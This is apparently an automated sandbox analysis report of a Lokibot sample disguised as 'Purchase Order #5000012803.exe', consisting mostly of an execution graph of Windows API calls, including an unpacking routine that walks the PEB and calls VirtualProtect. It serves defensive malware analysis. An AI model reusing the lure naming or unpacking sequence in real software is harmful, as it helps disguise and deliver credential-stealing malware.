                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: Purchase Order #5000012803.exe PID: 6940 Parent PID: 5652 Purchase Order #5000012803.exeCOMMON

                      Execution Graph

                      Execution Coverage:12%
                      Dynamic/Decrypted Code Coverage:6.2%
                      Signature Coverage:22.4%
                      Total number of Nodes:1328
                      Total number of Limit Nodes:25

                      Graph

                      execution_graph 3906 401cc1 GetDlgItem GetClientRect 3907 4029e8 18 API calls 3906->3907 3908 401cf1 LoadImageA SendMessageA 3907->3908 3909 40287d 3908->3909 3910 401d0f DeleteObject 3908->3910 3910->3909 3911 401dc1 3912 4029e8 18 API calls 3911->3912 3913 401dc7 3912->3913 3914 4029e8 18 API calls 3913->3914 3915 401dd0 3914->3915 3916 4029e8 18 API calls 3915->3916 3917 401dd9 3916->3917 3918 4029e8 18 API calls 3917->3918 3919 401de2 3918->3919 3920 401423 25 API calls 3919->3920 3921 401de9 ShellExecuteA 3920->3921 3922 401e16 3921->3922 3923 19ec1d 3928 19eb07 GetPEB 3923->3928 3925 19edb9 3926 19ec82 3926->3925 3929 19f1b9 3926->3929 3928->3926 3943 19eb07 GetPEB 3929->3943 3931 19f210 3932 19f2fb 3931->3932 3934 19f308 3931->3934 3942 19f2be 3931->3942 3944 19f4e1 3932->3944 3934->3942 3957 19e6a7 3934->3957 3936 19f47b 3939 19e6a7 4 API calls 3936->3939 3937 19f40e 3937->3936 3938 19e6a7 4 API calls 3937->3938 3937->3942 3938->3937 3940 19f49a 3939->3940 3940->3942 3966 19e5f6 3940->3966 3942->3925 3943->3931 3975 19eb07 GetPEB 3944->3975 3946 19f4ef 3947 19f6a2 3946->3947 3956 19f5f8 3946->3956 3976 19e7a8 3946->3976 3949 19e6a7 4 API calls 3947->3949 3947->3956 3951 19f6ee 3949->3951 3950 19f748 3953 19e6a7 4 API calls 3950->3953 3951->3950 3952 19e6a7 4 API calls 3951->3952 3951->3956 3952->3951 3954 19f762 3953->3954 3955 19e5f6 4 API calls 3954->3955 3954->3956 3955->3956 3956->3942 3958 19e6c2 3957->3958 3959 19eb46 GetPEB 3958->3959 3960 19e6e3 3959->3960 3961 19e6eb 3960->3961 3962 19e775 3960->3962 3963 19e842 3 API calls 3961->3963 4000 19e5c0 3962->4000 3965 19e75c 3963->3965 3965->3937 3967 19e611 3966->3967 3968 19eb46 GetPEB 3967->3968 3969 19e632 3968->3969 3970 19e67c 3969->3970 3971 19e636 3969->3971 4003 19e5d2 3970->4003 3972 19e842 3 API calls 3971->3972 3974 19e671 3972->3974 3974->3942 3975->3946 3977 19e7bb 3976->3977 3985 19eb46 GetPEB 3977->3985 3979 19e7dc 3980 19e7e0 3979->3980 3981 19e826 3979->3981 3987 19e842 GetPEB 3980->3987 3991 19e5e4 3981->3991 3984 19e81b 3984->3947 3986 19eb69 3985->3986 3986->3979 3988 19e8a7 3987->3988 3994 19eb84 GetPEB 3988->3994 3990 19e91b 3990->3984 3992 19e842 3 API calls 3991->3992 3993 19e5ee 3992->3993 3993->3984 3995 19eb97 3994->3995 3997 19ebab 3995->3997 3998 19ea56 GetPEB 3995->3998 3997->3990 3999 19ea81 3998->3999 3999->3995 4001 19e842 3 API calls 4000->4001 4002 19e5ca 4001->4002 4002->3965 4004 19e842 3 API calls 4003->4004 4005 19e5dc 4004->4005 4005->3974 4006 401ec5 4007 4029e8 18 API calls 4006->4007 4008 401ecc GetFileVersionInfoSizeA 4007->4008 4009 401eef GlobalAlloc 4008->4009 4010 401f45 4008->4010 4009->4010 4011 401f03 GetFileVersionInfoA 4009->4011 4011->4010 4012 401f14 VerQueryValueA 4011->4012 4012->4010 4013 401f2d 4012->4013 4017 4059e3 wsprintfA 4013->4017 4015 401f39 4018 4059e3 wsprintfA 4015->4018 4017->4015 4018->4010 4019 4014ca 4020 404e23 25 API calls 4019->4020 4021 4014d1 4020->4021 4022 403f4b lstrcpynA lstrlenA 4023 40604c 4024 405ed0 4023->4024 4025 40683b 4024->4025 4026 405f51 GlobalFree 4024->4026 4027 405f5a GlobalAlloc 4024->4027 4028 405fd1 GlobalAlloc 4024->4028 4029 405fc8 GlobalFree 4024->4029 4026->4027 4027->4024 4027->4025 4028->4024 4028->4025 4029->4028 3342 401f51 3343 401f63 3342->3343 3353 402004 3342->3353 3363 4029e8 3343->3363 3346 401423 25 API calls 3351 40215b 3346->3351 3347 4029e8 18 API calls 3348 401f73 3347->3348 3349 401f88 LoadLibraryExA 3348->3349 3350 401f7b GetModuleHandleA 3348->3350 3352 401f98 GetProcAddress 3349->3352 3349->3353 3350->3349 3350->3352 3354 401fe5 3352->3354 3355 401fa8 3352->3355 3353->3346 3378 404e23 3354->3378 3357 401fb0 3355->3357 3358 401fc7 3355->3358 3375 401423 3357->3375 3369 72b210a0 3358->3369 3359 401fb8 3359->3351 3361 401ff8 FreeLibrary 3359->3361 3361->3351 3364 4029f4 3363->3364 3389 405aa7 3364->3389 3367 401f6a 3367->3347 3429 72b21000 3369->3429 3374 72b21184 3374->3359 3376 404e23 25 API calls 3375->3376 3377 401431 3376->3377 3377->3359 3379 404e3e 3378->3379 3388 404ee1 3378->3388 3380 404e5b lstrlenA 3379->3380 3381 405aa7 18 API calls 3379->3381 3382 404e84 3380->3382 3383 404e69 lstrlenA 3380->3383 3381->3380 3385 404e97 3382->3385 3386 404e8a SetWindowTextA 3382->3386 3384 404e7b lstrcatA 3383->3384 3383->3388 3384->3382 3387 404e9d SendMessageA SendMessageA SendMessageA 3385->3387 3385->3388 3386->3385 3387->3388 3388->3359 3401 405ab4 3389->3401 3390 405cca 3391 402a15 3390->3391 3424 405a85 lstrcpynA 3390->3424 3391->3367 3408 405ce3 3391->3408 3393 405b48 GetVersion 3404 405b55 3393->3404 3394 405ca1 lstrlenA 3394->3401 3397 405aa7 10 API calls 3397->3394 3399 405bc0 GetSystemDirectoryA 3399->3404 3400 405bd3 GetWindowsDirectoryA 3400->3404 3401->3390 3401->3393 3401->3394 3401->3397 3402 405ce3 5 API calls 3401->3402 3422 4059e3 wsprintfA 3401->3422 3423 405a85 lstrcpynA 3401->3423 3402->3401 3403 405c07 SHGetSpecialFolderLocation 3403->3404 3407 405c1f SHGetPathFromIDListA CoTaskMemFree 3403->3407 3404->3399 3404->3400 3404->3401 3404->3403 3405 405aa7 10 API calls 3404->3405 3406 405c4a lstrcatA 3404->3406 3417 40596c RegOpenKeyExA 3404->3417 3405->3404 3406->3401 3407->3404 3415 405cef 3408->3415 3409 405d5b CharPrevA 3413 405d57 3409->3413 3410 405d4c CharNextA 3410->3413 3410->3415 3411 405d76 3411->3367 3413->3409 3413->3411 3414 405d3a CharNextA 3414->3415 3415->3410 3415->3413 3415->3414 3416 405d47 CharNextA 3415->3416 3425 4055a3 3415->3425 3416->3410 3418 4059dd 3417->3418 3419 40599f RegQueryValueExA 3417->3419 3418->3404 3420 4059c0 RegCloseKey 3419->3420 3420->3418 3422->3401 3423->3401 3424->3391 3426 4055a9 3425->3426 3427 4055bc 3426->3427 3428 4055af CharNextA 3426->3428 3427->3415 3428->3426 3430 72b2100c GetTempPathW 3429->3430 3431 72b21030 3430->3431 3432 72b21045 VirtualProtect CreateFileW ReadFile 3431->3432 3432->3374 4037 4014d6 4042 4029cb 4037->4042 4039 4014dc Sleep 4041 40287d 4039->4041 4043 405aa7 18 API calls 4042->4043 4044 4029df 4043->4044 4044->4039 4050 402858 SendMessageA 4051 402872 InvalidateRect 4050->4051 4052 40287d 4050->4052 4051->4052 4053 4018d8 4054 40190f 4053->4054 4055 4029e8 18 API calls 4054->4055 4056 401914 4055->4056 4057 4053aa 68 API calls 4056->4057 4058 40191d 4057->4058 4059 402259 4060 4029e8 18 API calls 4059->4060 4061 402267 4060->4061 4062 4029e8 18 API calls 4061->4062 4063 402270 4062->4063 4064 4029e8 18 API calls 4063->4064 4065 40227a GetPrivateProfileStringA 4064->4065 4066 40155b 4067 401577 ShowWindow 4066->4067 4068 40157e 4066->4068 4067->4068 4069 40158c ShowWindow 4068->4069 4070 40287d 4068->4070 4069->4070 4071 4018db 4072 4029e8 18 API calls 4071->4072 4073 4018e2 4072->4073 4074 405346 MessageBoxIndirectA 4073->4074 4075 4018eb 4074->4075 4076 404f61 4077 404f82 GetDlgItem GetDlgItem GetDlgItem 4076->4077 4078 40510d 4076->4078 4122 403e6c SendMessageA 4077->4122 4080 405116 GetDlgItem CreateThread CloseHandle 4078->4080 4081 40513e 4078->4081 4080->4081 4082 405169 4081->4082 4084 405155 ShowWindow ShowWindow 4081->4084 4085 40518b 4081->4085 4086 4051c7 4082->4086 4088 4051a0 ShowWindow 4082->4088 4089 40517a 4082->4089 4083 404ff3 4091 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 4083->4091 4127 403e6c SendMessageA 4084->4127 4131 403e9e 4085->4131 4086->4085 4094 4051d2 SendMessageA 4086->4094 4097 4051c0 4088->4097 4098 4051b2 4088->4098 4128 403e10 4089->4128 4092 405069 4091->4092 4093 40504d SendMessageA SendMessageA 4091->4093 4099 40507c 4092->4099 4100 40506e SendMessageA 4092->4100 4093->4092 4096 405199 4094->4096 4101 4051eb CreatePopupMenu 4094->4101 4103 403e10 SendMessageA 4097->4103 4102 404e23 25 API calls 4098->4102 4123 403e37 4099->4123 4100->4099 4104 405aa7 18 API calls 4101->4104 4102->4097 4103->4086 4106 4051fb AppendMenuA 4104->4106 4108 405221 4106->4108 4109 40520e GetWindowRect 4106->4109 4107 40508c 4110 405095 ShowWindow 4107->4110 4111 4050c9 GetDlgItem SendMessageA 4107->4111 4112 40522a TrackPopupMenu 4108->4112 4109->4112 4113 4050b8 4110->4113 4114 4050ab ShowWindow 4110->4114 4111->4096 4115 4050f0 SendMessageA SendMessageA 4111->4115 4112->4096 4116 405248 4112->4116 4126 403e6c SendMessageA 4113->4126 4114->4113 4115->4096 4117 405264 SendMessageA 4116->4117 4117->4117 4119 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4117->4119 4120 4052a3 SendMessageA 4119->4120 4120->4120 4121 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4120->4121 4121->4096 4122->4083 4124 405aa7 18 API calls 4123->4124 4125 403e42 SetDlgItemTextA 4124->4125 4125->4107 4126->4111 4127->4082 4129 403e17 4128->4129 4130 403e1d SendMessageA 4128->4130 4129->4130 4130->4085 4132 403eb6 GetWindowLongA 4131->4132 4142 403f3f 4131->4142 4133 403ec7 4132->4133 4132->4142 4134 403ed6 GetSysColor 4133->4134 4135 403ed9 4133->4135 4134->4135 4136 403ee9 SetBkMode 4135->4136 4137 403edf SetTextColor 4135->4137 4138 403f01 GetSysColor 4136->4138 4139 403f07 4136->4139 4137->4136 4138->4139 4140 403f18 4139->4140 4141 403f0e SetBkColor 4139->4141 4140->4142 4143 403f32 CreateBrushIndirect 4140->4143 4144 403f2b DeleteObject 4140->4144 4141->4140 4142->4096 4143->4142 4144->4143 4145 403964 4146 403ab7 4145->4146 4147 40397c 4145->4147 4149 403b08 4146->4149 4150 403ac8 GetDlgItem GetDlgItem 4146->4150 4147->4146 4148 403988 4147->4148 4151 403993 SetWindowPos 4148->4151 4152 4039a6 4148->4152 4154 403b62 4149->4154 4162 401389 2 API calls 4149->4162 4153 403e37 19 API calls 4150->4153 4151->4152 4155 4039c3 4152->4155 4156 4039ab ShowWindow 4152->4156 4157 403af2 SetClassLongA 4153->4157 4158 403e83 SendMessageA 4154->4158 4175 403ab2 4154->4175 4159 4039e5 4155->4159 4160 4039cb DestroyWindow 4155->4160 4156->4155 4161 40140b 2 API calls 4157->4161 4187 403b74 4158->4187 4163 4039ea SetWindowLongA 4159->4163 4164 4039fb 4159->4164 4212 403dc0 4160->4212 4161->4149 4165 403b3a 4162->4165 4163->4175 4168 403a72 4164->4168 4169 403a07 GetDlgItem 4164->4169 4165->4154 4170 403b3e SendMessageA 4165->4170 4166 40140b 2 API calls 4166->4187 4167 403dc2 DestroyWindow EndDialog 4167->4212 4174 403e9e 8 API calls 4168->4174 4172 403a37 4169->4172 4173 403a1a SendMessageA IsWindowEnabled 4169->4173 4170->4175 4171 403df1 ShowWindow 4171->4175 4177 403a44 4172->4177 4178 403a57 4172->4178 4179 403a8b SendMessageA 4172->4179 4186 403a3c 4172->4186 4173->4172 4173->4175 4174->4175 4176 405aa7 18 API calls 4176->4187 4177->4179 4177->4186 4181 403a74 4178->4181 4182 403a5f 4178->4182 4179->4168 4180 403e10 SendMessageA 4180->4168 4184 40140b 2 API calls 4181->4184 4183 40140b 2 API calls 4182->4183 4183->4186 4184->4186 4185 403e37 19 API calls 4185->4187 4186->4168 4186->4180 4187->4166 4187->4167 4187->4175 4187->4176 4187->4185 4188 403e37 19 API calls 4187->4188 4203 403d02 DestroyWindow 4187->4203 4189 403bef GetDlgItem 4188->4189 4190 403c04 4189->4190 4191 403c0c ShowWindow EnableWindow 4189->4191 4190->4191 4213 403e59 EnableWindow 4191->4213 4193 403c36 EnableWindow 4196 403c4a 4193->4196 4194 403c4f GetSystemMenu EnableMenuItem SendMessageA 4195 403c7f SendMessageA 4194->4195 4194->4196 4195->4196 4196->4194 4214 403e6c SendMessageA 4196->4214 4215 405a85 lstrcpynA 4196->4215 4199 403cad lstrlenA 4200 405aa7 18 API calls 4199->4200 4201 403cbe SetWindowTextA 4200->4201 4202 401389 2 API calls 4201->4202 4202->4187 4204 403d1c CreateDialogParamA 4203->4204 4203->4212 4205 403d4f 4204->4205 4204->4212 4206 403e37 19 API calls 4205->4206 4207 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4206->4207 4208 401389 2 API calls 4207->4208 4209 403da0 4208->4209 4209->4175 4210 403da8 ShowWindow 4209->4210 4211 403e83 SendMessageA 4210->4211 4211->4212 4212->4171 4212->4175 4213->4193 4214->4196 4215->4199 4216 402164 4217 4029e8 18 API calls 4216->4217 4218 40216a 4217->4218 4219 4029e8 18 API calls 4218->4219 4220 402173 4219->4220 4221 4029e8 18 API calls 4220->4221 4222 40217c 4221->4222 4223 405d7c 2 API calls 4222->4223 4224 402185 4223->4224 4225 402196 lstrlenA lstrlenA 4224->4225 4226 402189 4224->4226 4227 404e23 25 API calls 4225->4227 4228 404e23 25 API calls 4226->4228 4229 4021d2 SHFileOperationA 4227->4229 4230 402191 4228->4230 4229->4226 4229->4230 4231 4019e6 4232 4029e8 18 API calls 4231->4232 4233 4019ef ExpandEnvironmentStringsA 4232->4233 4234 401a03 4233->4234 4235 401a16 4233->4235 4234->4235 4236 401a08 lstrcmpA 4234->4236 4236->4235 4237 4021e6 4238 4021ed 4237->4238 4241 402200 4237->4241 4239 405aa7 18 API calls 4238->4239 4240 4021fa 4239->4240 4242 405346 MessageBoxIndirectA 4240->4242 4242->4241 4243 19f1b1 4245 19f210 4243->4245 4257 19eb07 GetPEB 4243->4257 4246 19f2fb 4245->4246 4248 19f308 4245->4248 4256 19f2be 4245->4256 4247 19f4e1 5 API calls 4246->4247 4247->4256 4249 19e6a7 4 API calls 4248->4249 4248->4256 4251 19f40e 4249->4251 4250 19f47b 4253 19e6a7 4 API calls 4250->4253 4251->4250 4252 19e6a7 4 API calls 4251->4252 4251->4256 4252->4251 4254 19f49a 4253->4254 4255 19e5f6 4 API calls 4254->4255 4254->4256 4255->4256 4257->4245 4265 401c6d 4266 4029cb 18 API calls 4265->4266 4267 401c73 IsWindow 4266->4267 4268 4019d6 4267->4268 4269 4025ed 4270 4025f4 4269->4270 4271 40287d 4269->4271 4272 4025fa FindClose 4270->4272 4272->4271 4273 40266e 4274 4029e8 18 API calls 4273->4274 4276 40267c 4274->4276 4275 402692 4278 40573d 2 API calls 4275->4278 4276->4275 4277 4029e8 18 API calls 4276->4277 4277->4275 4279 402698 4278->4279 4299 40575c GetFileAttributesA CreateFileA 4279->4299 4281 4026a5 4282 4026b1 GlobalAlloc 4281->4282 4283 40274e 4281->4283 4284 402745 CloseHandle 4282->4284 4285 4026ca 4282->4285 4286 402756 DeleteFileA 4283->4286 4287 402769 4283->4287 4284->4283 4300 4031da SetFilePointer 4285->4300 4286->4287 4289 4026d0 4290 4031a8 ReadFile 4289->4290 4291 4026d9 GlobalAlloc 4290->4291 4292 4026e9 4291->4292 4293 40271d WriteFile GlobalFree 4291->4293 4295 402f01 47 API calls 4292->4295 4294 402f01 47 API calls 4293->4294 4296 402742 4294->4296 4297 4026f6 4295->4297 4296->4284 4298 402714 GlobalFree 4297->4298 4298->4293 4299->4281 4300->4289 4301 40276f 4302 4029cb 18 API calls 4301->4302 4303 402775 4302->4303 4304 4027b0 4303->4304 4305 402799 4303->4305 4310 40264e 4303->4310 4306 4027c6 4304->4306 4307 4027ba 4304->4307 4308 4027ad 4305->4308 4309 40279e 4305->4309 4312 405aa7 18 API calls 4306->4312 4311 4029cb 18 API calls 4307->4311 4316 4059e3 wsprintfA 4308->4316 4315 405a85 lstrcpynA 4309->4315 4311->4310 4312->4310 4315->4310 4316->4310 4317 4014f0 SetForegroundWindow 4318 40287d 4317->4318 4319 404772 GetDlgItem GetDlgItem 4320 4047c6 7 API calls 4319->4320 4328 4049e3 4319->4328 4321 40486c DeleteObject 4320->4321 4322 40485f SendMessageA 4320->4322 4323 404877 4321->4323 4322->4321 4325 4048ae 4323->4325 4327 405aa7 18 API calls 4323->4327 4324 404acd 4326 404b7c 4324->4326 4330 4049d6 4324->4330 4336 404b26 SendMessageA 4324->4336 4329 403e37 19 API calls 4325->4329 4331 404b91 4326->4331 4332 404b85 SendMessageA 4326->4332 4333 404890 SendMessageA SendMessageA 4327->4333 4328->4324 4351 404a57 4328->4351 4372 4046f2 SendMessageA 4328->4372 4334 4048c2 4329->4334 4337 403e9e 8 API calls 4330->4337 4343 404ba3 ImageList_Destroy 4331->4343 4344 404baa 4331->4344 4348 404bba 4331->4348 4332->4331 4333->4323 4335 403e37 19 API calls 4334->4335 4352 4048d0 4335->4352 4336->4330 4341 404b3b SendMessageA 4336->4341 4342 404d6c 4337->4342 4338 404abf SendMessageA 4338->4324 4340 404d20 4340->4330 4349 404d32 ShowWindow GetDlgItem ShowWindow 4340->4349 4347 404b4e 4341->4347 4343->4344 4345 404bb3 GlobalFree 4344->4345 4344->4348 4345->4348 4346 4049a4 GetWindowLongA SetWindowLongA 4350 4049bd 4346->4350 4358 404b5f SendMessageA 4347->4358 4348->4340 4357 40140b 2 API calls 4348->4357 4366 404bec 4348->4366 4349->4330 4353 4049c3 ShowWindow 4350->4353 4354 4049db 4350->4354 4351->4324 4351->4338 4352->4346 4356 40491f SendMessageA 4352->4356 4359 40499e 4352->4359 4361 40495b SendMessageA 4352->4361 4362 40496c SendMessageA 4352->4362 4370 403e6c SendMessageA 4353->4370 4371 403e6c SendMessageA 4354->4371 4356->4352 4357->4366 4358->4326 4359->4346 4359->4350 4361->4352 4362->4352 4363 404cf6 InvalidateRect 4363->4340 4364 404d0c 4363->4364 4377 404610 4364->4377 4365 404c1a SendMessageA 4369 404c30 4365->4369 4366->4365 4366->4369 4368 404ca4 SendMessageA SendMessageA 4368->4369 4369->4363 4369->4368 4370->4330 4371->4328 4373 404751 SendMessageA 4372->4373 4374 404715 GetMessagePos ScreenToClient SendMessageA 4372->4374 4375 404749 4373->4375 4374->4375 4376 40474e 4374->4376 4375->4351 4376->4373 4378 40462a 4377->4378 4379 405aa7 18 API calls 4378->4379 4380 40465f 4379->4380 4381 405aa7 18 API calls 4380->4381 4382 40466a 4381->4382 4383 405aa7 18 API calls 4382->4383 4384 40469b lstrlenA wsprintfA SetDlgItemTextA 4383->4384 4384->4340 4385 404d73 4386 404d81 4385->4386 4387 404d98 4385->4387 4389 404d87 4386->4389 4403 404e01 4386->4403 4388 404da6 IsWindowVisible 4387->4388 4395 404dbd 4387->4395 4390 404db3 4388->4390 4388->4403 4392 403e83 SendMessageA 4389->4392 4393 4046f2 5 API calls 4390->4393 4391 404e07 CallWindowProcA 4394 404d91 4391->4394 4392->4394 4393->4395 4395->4391 4404 405a85 lstrcpynA 4395->4404 4397 404dec 4405 4059e3 wsprintfA 4397->4405 4399 404df3 4400 40140b 2 API calls 4399->4400 4401 404dfa 4400->4401 4406 405a85 lstrcpynA 4401->4406 4403->4391 4404->4397 4405->4399 4406->4403 4407 404275 4408 4042b3 4407->4408 4409 4042a6 4407->4409 4411 4042bc GetDlgItem 4408->4411 4417 40431f 4408->4417 4468 40532a GetDlgItemTextA 4409->4468 4413 4042d0 4411->4413 4412 4042ad 4415 405ce3 5 API calls 4412->4415 4419 4042e4 SetWindowTextA 4413->4419 4424 40560c 4 API calls 4413->4424 4414 404403 4416 40458f 4414->4416 4470 40532a GetDlgItemTextA 4414->4470 4415->4408 4423 403e9e 8 API calls 4416->4423 4417->4414 4417->4416 4420 405aa7 18 API calls 4417->4420 4422 403e37 19 API calls 4419->4422 4425 404395 SHBrowseForFolderA 4420->4425 4421 40442f 4426 405659 18 API calls 4421->4426 4427 404302 4422->4427 4428 4045a3 4423->4428 4429 4042da 4424->4429 4425->4414 4430 4043ad CoTaskMemFree 4425->4430 4431 404435 4426->4431 4432 403e37 19 API calls 4427->4432 4429->4419 4433 405578 3 API calls 4429->4433 4434 405578 3 API calls 4430->4434 4471 405a85 lstrcpynA 4431->4471 4435 404310 4432->4435 4433->4419 4436 4043ba 4434->4436 4469 403e6c SendMessageA 4435->4469 4439 4043f1 SetDlgItemTextA 4436->4439 4444 405aa7 18 API calls 4436->4444 4439->4414 4440 404318 4442 405da3 3 API calls 4440->4442 4441 40444c 4443 405da3 3 API calls 4441->4443 4442->4417 4451 404454 4443->4451 4445 4043d9 lstrcmpiA 4444->4445 4445->4439 4448 4043ea lstrcatA 4445->4448 4446 40448e 4472 405a85 lstrcpynA 4446->4472 4448->4439 4449 404497 4450 40560c 4 API calls 4449->4450 4452 40449d GetDiskFreeSpaceA 4450->4452 4451->4446 4454 4055bf 2 API calls 4451->4454 4456 4044e1 4451->4456 4455 4044bf MulDiv 4452->4455 4452->4456 4454->4451 4455->4456 4457 40453e 4456->4457 4458 404610 21 API calls 4456->4458 4459 404561 4457->4459 4461 40140b 2 API calls 4457->4461 4460 404530 4458->4460 4473 403e59 EnableWindow 4459->4473 4463 404540 SetDlgItemTextA 4460->4463 4464 404535 4460->4464 4461->4459 4463->4457 4466 404610 21 API calls 4464->4466 4465 40457d 4465->4416 4474 40420a 4465->4474 4466->4457 4468->4412 4469->4440 4470->4421 4471->4441 4472->4449 4473->4465 4475 404218 4474->4475 4476 40421d SendMessageA 4474->4476 4475->4476 4476->4416 4477 4022f5 4478 4022fb 4477->4478 4479 4029e8 18 API calls 4478->4479 4480 40230d 4479->4480 4481 4029e8 18 API calls 4480->4481 4482 402317 RegCreateKeyExA 4481->4482 4483 402341 4482->4483 4484 40264e 4482->4484 4485 402359 4483->4485 4486 4029e8 18 API calls 4483->4486 4487 402365 4485->4487 4489 4029cb 18 API calls 4485->4489 4488 402352 lstrlenA 4486->4488 4490 402380 RegSetValueExA 4487->4490 4491 402f01 47 API calls 4487->4491 4488->4485 4489->4487 4492 402396 RegCloseKey 4490->4492 4491->4490 4492->4484 4494 4027f5 4495 4029cb 18 API calls 4494->4495 4496 4027fb 4495->4496 4497 40282c 4496->4497 4498 40264e 4496->4498 4500 402809 4496->4500 4497->4498 4499 405aa7 18 API calls 4497->4499 4499->4498 4500->4498 4502 4059e3 wsprintfA 4500->4502 4502->4498 4503 4024f8 4504 4029cb 18 API calls 4503->4504 4507 402502 4504->4507 4505 402578 4506 402536 ReadFile 4506->4505 4506->4507 4507->4505 4507->4506 4508 40257a 4507->4508 4510 40258a 4507->4510 4512 4059e3 wsprintfA 4508->4512 4510->4505 4511 4025a0 SetFilePointer 4510->4511 4511->4505 4512->4505 4513 4016fa 4514 4029e8 18 API calls 4513->4514 4515 401701 SearchPathA 4514->4515 4516 40171c 4515->4516 4517 4014fe 4518 401506 4517->4518 4520 401519 4517->4520 4519 4029cb 18 API calls 4518->4519 4519->4520 4521 403f7f 4522 403f95 4521->4522 4527 4040a2 4521->4527 4524 403e37 19 API calls 4522->4524 4523 404111 4525 40411b GetDlgItem 4523->4525 4526 4041e5 4523->4526 4528 403feb 4524->4528 4529 404131 4525->4529 4530 4041a3 4525->4530 4532 403e9e 8 API calls 4526->4532 4527->4523 4527->4526 4533 4040e6 GetDlgItem SendMessageA 4527->4533 4531 403e37 19 API calls 4528->4531 4529->4530 4536 404157 6 API calls 4529->4536 4530->4526 4537 4041b5 4530->4537 4534 403ff8 CheckDlgButton 4531->4534 4535 4041e0 4532->4535 4552 403e59 EnableWindow 4533->4552 4550 403e59 EnableWindow 4534->4550 4536->4530 4541 4041bb SendMessageA 4537->4541 4542 4041cc 4537->4542 4539 40410c 4543 40420a SendMessageA 4539->4543 4541->4542 4542->4535 4545 4041d2 SendMessageA 4542->4545 4543->4523 4544 404016 GetDlgItem 4551 403e6c SendMessageA 4544->4551 4545->4535 4547 40402c SendMessageA 4548 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4547->4548 4549 40404a GetSysColor 4547->4549 4548->4535 4549->4548 4550->4544 4551->4547 4552->4539 4553 401000 4554 401037 BeginPaint GetClientRect 4553->4554 4555 40100c DefWindowProcA 4553->4555 4557 4010f3 4554->4557 4558 401179 4555->4558 4559 401073 CreateBrushIndirect FillRect DeleteObject 4557->4559 4560 4010fc 4557->4560 4559->4557 4561 401102 CreateFontIndirectA 4560->4561 4562 401167 EndPaint 4560->4562 4561->4562 4563 401112 6 API calls 4561->4563 4562->4558 4563->4562 4578 401b06 4579 401b13 4578->4579 4580 401b57 4578->4580 4581 4021ed 4579->4581 4587 401b2a 4579->4587 4582 401b80 GlobalAlloc 4580->4582 4583 401b5b 4580->4583 4584 405aa7 18 API calls 4581->4584 4585 405aa7 18 API calls 4582->4585 4596 401b9b 4583->4596 4599 405a85 lstrcpynA 4583->4599 4586 4021fa 4584->4586 4585->4596 4591 405346 MessageBoxIndirectA 4586->4591 4597 405a85 lstrcpynA 4587->4597 4590 401b6d GlobalFree 4590->4596 4591->4596 4592 401b39 4598 405a85 lstrcpynA 4592->4598 4594 401b48 4600 405a85 lstrcpynA 4594->4600 4597->4592 4598->4594 4599->4590 4600->4596 4601 402607 4602 40260a 4601->4602 4604 402622 4601->4604 4603 402617 FindNextFileA 4602->4603 4603->4604 4605 402661 4603->4605 4607 405a85 lstrcpynA 4605->4607 4607->4604 3896 401389 3898 401390 3896->3898 3897 4013fe 3898->3897 3899 4013cb MulDiv SendMessageA 3898->3899 3899->3898 4615 401c8a 4616 4029cb 18 API calls 4615->4616 4617 401c91 4616->4617 4618 4029cb 18 API calls 4617->4618 4619 401c99 GetDlgItem 4618->4619 4620 4024aa 4619->4620 4620->4620 4621 40248e 4622 4029e8 18 API calls 4621->4622 4623 402495 4622->4623 4626 40575c GetFileAttributesA CreateFileA 4623->4626 4625 4024a1 4626->4625 4627 402012 4628 4029e8 18 API calls 4627->4628 4629 402019 4628->4629 4630 4029e8 18 API calls 4629->4630 4631 402023 4630->4631 4632 4029e8 18 API calls 4631->4632 4633 40202c 4632->4633 4634 4029e8 18 API calls 4633->4634 4635 402036 4634->4635 4636 4029e8 18 API calls 4635->4636 4638 402040 4636->4638 4637 402054 CoCreateInstance 4642 402073 4637->4642 4643 402129 4637->4643 4638->4637 4639 4029e8 18 API calls 4638->4639 4639->4637 4640 401423 25 API calls 4641 40215b 4640->4641 4642->4643 4644 402108 MultiByteToWideChar 4642->4644 4643->4640 4643->4641 4644->4643 4645 402215 4646 402223 4645->4646 4647 40221d 4645->4647 4649 402233 4646->4649 4650 4029e8 18 API calls 4646->4650 4648 4029e8 18 API calls 4647->4648 4648->4646 4651 4029e8 18 API calls 4649->4651 4653 402241 4649->4653 4650->4649 4651->4653 4652 4029e8 18 API calls 4654 40224a WritePrivateProfileStringA 4652->4654 4653->4652 4655 401595 4656 4029e8 18 API calls 4655->4656 4657 40159c SetFileAttributesA 4656->4657 4658 4015ae 4657->4658 4659 401d95 4660 4029cb 18 API calls 4659->4660 4661 401d9b 4660->4661 4662 4029cb 18 API calls 4661->4662 4663 401da4 4662->4663 4664 401db6 EnableWindow 4663->4664 4665 401dab ShowWindow 4663->4665 4666 40287d 4664->4666 4665->4666 4667 401e95 4668 4029e8 18 API calls 4667->4668 4669 401e9c 4668->4669 4670 405d7c 2 API calls 4669->4670 4671 401ea2 4670->4671 4673 401eb4 4671->4673 4674 4059e3 wsprintfA 4671->4674 4674->4673 4675 401696 4676 4029e8 18 API calls 4675->4676 4677 40169c GetFullPathNameA 4676->4677 4678 4016b3 4677->4678 4684 4016d4 4677->4684 4681 405d7c 2 API calls 4678->4681 4678->4684 4679 4016e8 GetShortPathNameA 4680 40287d 4679->4680 4682 4016c4 4681->4682 4682->4684 4685 405a85 lstrcpynA 4682->4685 4684->4679 4684->4680 4685->4684 4693 402419 4703 402af2 4693->4703 4695 402423 4696 4029cb 18 API calls 4695->4696 4697 40242c 4696->4697 4698 402443 RegEnumKeyA 4697->4698 4699 40244f RegEnumValueA 4697->4699 4700 40264e 4697->4700 4701 402468 RegCloseKey 4698->4701 4699->4700 4699->4701 4701->4700 4704 4029e8 18 API calls 4703->4704 4705 402b0b 4704->4705 4706 402b19 RegOpenKeyExA 4705->4706 4706->4695 4707 402299 4708 4022c9 4707->4708 4709 40229e 4707->4709 4711 4029e8 18 API calls 4708->4711 4710 402af2 19 API calls 4709->4710 4713 4022a5 4710->4713 4712 4022d0 4711->4712 4718 402a28 RegOpenKeyExA 4712->4718 4714 4029e8 18 API calls 4713->4714 4717 4022e6 4713->4717 